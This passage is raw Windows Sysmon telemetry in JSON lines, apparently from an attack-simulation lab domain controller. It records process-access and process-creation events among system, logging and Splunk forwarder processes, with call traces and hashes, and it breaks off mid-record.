{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4499,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.207\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.207","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4500,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.207\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.207","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4501,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.207\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1185-5F25-0000-001090340600}\r\nTargetProcessId: 4584\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.207","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1185-5F25-0000-001090340600}","TargetProcessId":"4584","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4502,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.348\r\nSourceProcessGUID: {E2A3D6B1-1185-5F25-0000-001090340600}\r\nSourceProcessId: 4584\r\nSourceThreadId: 4580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.348","SourceProcessGUID":"{E2A3D6B1-1185-5F25-0000-001090340600}","SourceProcessId":"4584","SourceThreadId":"4580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4503,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.504\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.504","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4504,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.880\r\nProcessGuid: {E2A3D6B1-1185-5F25-0000-001048360600}\r\nProcessId: 4908\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.880","ProcessGuid":"{E2A3D6B1-1185-5F25-0000-001048360600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:53:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4505,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.879\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1185-5F25-0000-001048360600}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.879","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1185-5F25-0000-001048360600}","TargetProcessId":"4908","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4506,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.879\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1185-5F25-0000-001048360600}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.879","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1185-5F25-0000-001048360600}","TargetProcessId":"4908","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:53:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4507,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 